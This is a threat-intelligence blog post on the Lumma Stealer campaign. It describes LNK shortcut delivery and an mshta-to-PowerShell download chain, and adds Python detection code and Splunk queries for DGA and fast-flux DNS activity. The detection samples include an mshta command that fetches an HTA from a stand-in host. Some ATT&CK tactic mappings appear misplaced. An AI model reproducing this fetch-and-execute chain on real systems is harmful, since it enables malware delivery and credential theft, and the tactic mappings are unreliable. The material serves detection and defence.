The rise of infostealer malware has fuelled a wave of cybercrime, with businesses facing escalating risks from stolen credentials, unauthorised access, and data leaks. Threat actors are no longer targeting only large enterprises: organisations across industries are now in the crosshairs of sophisticated malware campaigns.
Among the most active threats today is Lumma Stealer, a Malware-as-a-Service (MaaS) strain that allows attackers to harvest login credentials, financial data, and system information at scale. This blog delves into how Lumma Stealer campaigns are executed, the techniques used to evade detection, and critical security measures to mitigate the risk of compromise.
The surge in infostealer campaigns has particularly affected organisations in the EMEA region, with an increase of up to 58% according to Check Point. In 2024, these campaigns led to the infection of over 18 million devices, resulting in the exposure and sale of over 2.4 billion compromised credentials.
Lumma Stealer is a type of information-stealing malware offered through a Malware-as-a-Service (MaaS) platform. It targets Windows systems and is capable of stealing browser information, including credentials, cookies, autofill data, and browser extension data such as cryptocurrency wallets. Additionally, it collects .txt files from the user’s desktop and extracts data from programs like AnyDesk, FileZilla, KeePass, and Telegram. Written in C++, Lumma Stealer was first identified in September 2022. Threat actors have used logs from Lumma Stealer infections to gain initial access and deploy Cloak ransomware. Initial Access Brokers (IABs) then sell these credentials in underground marketplaces, fuelling a range of cyberattacks such as ransomware and fraud.
The ongoing Lumma Stealer campaign uses malicious LNK (shortcut) files disguised as legitimate PDF documents. These LNK files initiate a multi-stage infection process, leading to the deployment of Lumma Stealer on the victim's machine. The campaign targets multiple industries, including:
Initial access is commonly achieved through drive-by compromises using malicious WebDAV servers while users unknowingly visit infected websites.
When the malicious LNK file, masked as a PDF, is executed, it downloads and runs further payloads.
“http://x.x.x.x/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk”
The malicious LNK abuses the legitimate Windows binary mshta.exe to run an HTML Application (HTA) file, which in turn executes PowerShell commands that connect back to the command and control (C2) server. The final PowerShell script downloads and executes the infostealer “Kompass-4.1.2.exe” (Lumma Stealer).
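The LNK → mshta.exe → PowerShell chain described above, as an added detection example that is not part of the original post: three process-creation rules (mshta.exe launched with a remote URL or UNC/WebDAV path, PowerShell whose parent is mshta.exe, and PowerShell started with a hidden window, the T1564.003 behaviour listed later in this post) evaluated over constructed Sysmon-style events, plus a correlation step that links a flagged mshta.exe process to the PowerShell child it spawned. The events, process IDs and the 203.0.113.7 address are constructed sample data; the `<stage-2 placeholder>` command text stands in for whatever the HTA would actually run.

```python
import re

# Constructed sample events (field names follow Sysmon Event ID 1 conventions).
SAMPLE_EVENTS = [
    {"ProcessId": 1200, "ParentProcessId": 800, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    # mshta.exe fetching an HTA from a remote server (documentation-range IP, constructed)
    {"ProcessId": 3400, "ParentProcessId": 1200, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://203.0.113.7/stage.hta"},
    # PowerShell spawned by mshta.exe with a hidden window; payload text is a placeholder
    {"ProcessId": 4100, "ParentProcessId": 3400,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'powershell.exe -WindowStyle Hidden -NoProfile -Command "<stage-2 placeholder>"'},
    # benign: an administrator running a script from Explorer with a visible window
    {"ProcessId": 5000, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    # benign: a locally installed HTA front-end
    {"ProcessId": 5100, "ParentProcessId": 1200, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\ui.hta"'},
]

# http(s):// URL or a UNC path (\\host\share), which is also how WebDAV shares appear
REMOTE_SOURCE = re.compile(r"(https?://|\\\\[^\\\s]+\\)", re.IGNORECASE)
# -w hidden / -win hidden / -WindowStyle Hidden
HIDDEN_WINDOW = re.compile(r"-(w|win|windowstyle)\s+hidden", re.IGNORECASE)


def image_name(path):
    """File name component of a Windows image path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of the rules a single process-creation event matches."""
    hits = []
    img = image_name(event["Image"])
    parent = image_name(event["ParentImage"])
    cmd = event["CommandLine"]
    if img == "mshta.exe" and REMOTE_SOURCE.search(cmd):
        hits.append("mshta_remote_content")
    if img == "powershell.exe" and parent == "mshta.exe":
        hits.append("powershell_child_of_mshta")
    if img == "powershell.exe" and HIDDEN_WINDOW.search(cmd):
        hits.append("powershell_hidden_window")
    return hits


def evaluate_all(events):
    """Map each ProcessId to the list of rules it triggered (empty list if none)."""
    return {e["ProcessId"]: evaluate(e) for e in events}


def find_chains(events):
    """(mshta_pid, powershell_pid) pairs where a remote-content mshta.exe process
    is the direct parent of a PowerShell process: the chain this post describes."""
    by_pid = {e["ProcessId"]: e for e in events}
    chains = []
    for e in events:
        if "powershell_child_of_mshta" in evaluate(e):
            parent = by_pid.get(e["ParentProcessId"])
            if parent and "mshta_remote_content" in evaluate(parent):
                chains.append((parent["ProcessId"], e["ProcessId"]))
    return chains


if __name__ == "__main__":
    for pid, rules in evaluate_all(SAMPLE_EVENTS).items():
        if rules:
            print(pid, rules)
    print("chains:", find_chains(SAMPLE_EVENTS))
```

The per-event rules fire on their own, but the chain correlation is the higher-confidence signal: a hidden-window PowerShell alone is common in legitimate automation, whereas PowerShell whose parent is an mshta.exe that loaded remote content matches the infection flow above almost exactly.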
Infostealers often use Domain Generation Algorithms (DGAs) to facilitate communication with C2 servers. One way to detect DGA activity is to calculate the Shannon entropy of queried domain names, which highlights randomly generated labels. The two Splunk (SPL) queries below look for DGA activity and DNS fast flux. The first flags internal hosts that receive a large number of NXDOMAIN responses for three-label domain names within an 8-hour window:

```spl
| tstats c(query) as cc dc(query) as dcc values(query) as query where index="main" sourcetype="*dns*" query!="*in-addr*" query!="*.*.*.*" query!="*arpa*" query="*.*.*" query!="www*" query!="*.local" query!="*.main" query!="*.corp" query!="*.com" rcode_name=NXDOMAIN id.orig_h IN (10*,192.168*,172*) by id.orig_h _time span=8h | where dcc>=200 | eval query=mvfilter(match(query,"^([a-zA-Z0-9]+)\.([a-zA-Z0-9]+)\.([a-zA-Z0-9]+)$")) | where mvcount(query)>=1000 | fields - dcc cc
```
The second flags names that resolve to 100 or more distinct answers within a single hour, a pattern characteristic of fast-flux infrastructure:

```spl
| tstats dc(answers{}) as num_ips where index="main" sourcetype="*dns*" answers{}=* AA=true rejected=false (qtype_name=AAAA OR qtype_name=NS) by query _time span=1h | where num_ips>=100 and !isnull(query)
```
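The entropy approach and the two queries above, as an added example that is not part of the original post: Python that scores the registrable label of each queried name by Shannon entropy, flags internal hosts producing many high-entropy NXDOMAIN responses (the DGA signal of the first query, with entropy added as the post suggests) and flags names that answer with many distinct IPs inside one hour (the fast-flux signal of the second query). The DNS records, IP addresses and thresholds are constructed for the sample and are deliberately far lower than the 200/1000 and 100 used in the production queries; `registrable_label` assumes a single-label public suffix (no co.uk-style handling).

```python
import math
from collections import defaultdict
from datetime import datetime

# Constructed sample DNS records (not from the original post):
# (timestamp, source_ip, query, rcode, answers)
SAMPLE_DNS = [
    # 10.0.0.5 resolves a burst of random-looking names that all fail (DGA-like)
    ("2025-01-10T09:00:01", "10.0.0.5", "xkq7pv2mzr9t.net", "NXDOMAIN", []),
    ("2025-01-10T09:00:02", "10.0.0.5", "b4wnz8ykq3dh.org", "NXDOMAIN", []),
    ("2025-01-10T09:00:03", "10.0.0.5", "m9cft2xjpvqa.com", "NXDOMAIN", []),
    ("2025-01-10T09:00:04", "10.0.0.5", "zr3hqk8vwbpd.net", "NXDOMAIN", []),
    ("2025-01-10T09:00:05", "10.0.0.5", "t7yxc4mgnvsq.info", "NXDOMAIN", []),
    ("2025-01-10T09:00:06", "10.0.0.5", "qp2wdl6hbyjn.com", "NXDOMAIN", []),
    # 10.0.0.7 has ordinary traffic, including one failed lookup for an internal name
    ("2025-01-10T09:01:00", "10.0.0.7", "www.microsoft.com", "NOERROR", ["203.0.113.10"]),
    ("2025-01-10T09:01:05", "10.0.0.7", "update.example.com", "NOERROR", ["203.0.113.20"]),
    ("2025-01-10T09:01:09", "10.0.0.7", "intranet.corp", "NXDOMAIN", []),
    # one name whose answers rotate through many IPs within a single hour (fast-flux-like)
    ("2025-01-10T10:00:00", "10.0.0.9", "cdn-sync.example.net", "NOERROR", ["198.51.100.1", "198.51.100.2"]),
    ("2025-01-10T10:10:00", "10.0.0.9", "cdn-sync.example.net", "NOERROR", ["198.51.100.3", "198.51.100.4"]),
    ("2025-01-10T10:20:00", "10.0.0.9", "cdn-sync.example.net", "NOERROR", ["198.51.100.5"]),
    ("2025-01-10T10:30:00", "10.0.0.9", "cdn-sync.example.net", "NOERROR", ["198.51.100.1"]),
]


def shannon_entropy(text):
    """Shannon entropy of a string in bits per character: H = -sum(p_i * log2 p_i)."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_label(fqdn):
    """Label immediately left of the TLD, e.g. 'microsoft' for www.microsoft.com.
    Assumption: single-label public suffix (co.uk and similar are not handled)."""
    labels = fqdn.lower().strip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def flag_dga_hosts(records, min_nxdomain=5, min_entropy=3.3):
    """Hosts whose NXDOMAIN responses are both numerous and high-entropy.
    Returns {source_ip: (nxdomain_count, mean_entropy)} for flagged hosts."""
    per_host = defaultdict(list)
    for _ts, src, query, rcode, _answers in records:
        if rcode == "NXDOMAIN":
            per_host[src].append(shannon_entropy(registrable_label(query)))
    flagged = {}
    for src, entropies in per_host.items():
        mean = sum(entropies) / len(entropies)
        if len(entropies) >= min_nxdomain and mean >= min_entropy:
            flagged[src] = (len(entropies), round(mean, 3))
    return flagged


def flag_fast_flux(records, min_distinct_ips=4):
    """Names that resolve to many distinct IPs inside a single one-hour bucket.
    Returns {(query, hour_bucket_iso): distinct_ip_count} for flagged names."""
    ips_per_bucket = defaultdict(set)
    for ts, _src, query, rcode, answers in records:
        if rcode == "NOERROR" and answers:
            hour = datetime.fromisoformat(ts).replace(minute=0, second=0, microsecond=0)
            ips_per_bucket[(query, hour.isoformat())].update(answers)
    return {key: len(ips) for key, ips in ips_per_bucket.items() if len(ips) >= min_distinct_ips}


if __name__ == "__main__":
    print("DGA-like hosts:", flag_dga_hosts(SAMPLE_DNS))
    print("Fast-flux names:", flag_fast_flux(SAMPLE_DNS))
```

Twelve-character labels with no repeated characters score log2(12) ≈ 3.585 bits per character, while real brand names such as "microsoft" sit around 2.9; combining the entropy score with the NXDOMAIN volume the first query already counts reduces false positives from single typos or short-lived internal names.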
| Tactic | Technique |
|---|---|
| Execution (TA0002) | T1059 – Command and Scripting Interpreter: PowerShell |
| | T1204.002 – User Execution: Malicious File |
| | T1047 – Windows Management Instrumentation (WMI) |
| Persistence (TA0003) | T1547.001 – Registry Run Keys / Startup Folder |
| Privilege Escalation (TA0004) | T1218.011 – System Binary Proxy Execution: Rundll32 |
| Defense Evasion (TA0005) | T1027 – Obfuscated Files or Information |
| | T1036.003 – Masquerading: Rename System Utilities |
| | T1564.003 – Hide Artifacts: Hidden Window |
| Credential Access (TA0006) | T1012 – Query Registry |
| Discovery (TA0007) | T1082 – System Information Discovery |
| Lateral Movement (TA0008) | T1021.002 – Remote Services: SMB/Windows Admin Shares |
| Collection (TA0009) | T1114 – Email Collection |
| | T1560 – Archive Collected Data |
| Command and Control (TA0011) | T1071 – Application Layer Protocol |
| Exfiltration (TA0010) | T1041 – Exfiltration Over C2 Channel |
| Impact (TA0040) | T1489 – Service Stop |
| | T1490 – Inhibit System Recovery |
Malware strains like Lumma Stealer don’t just steal credentials: they act as gateways to larger cyber threats, including ransomware and network intrusions. Without proactive monitoring and advanced security controls, businesses risk financial losses, reputational damage, and regulatory consequences.
Organisations can help mitigate these risks by leveraging managed security services that provide continuous threat intelligence, incident response, and proactive vulnerability management. At CybaVerse, our Threat Detection & Response Services help businesses identify, analyse, and contain threats before they escalate.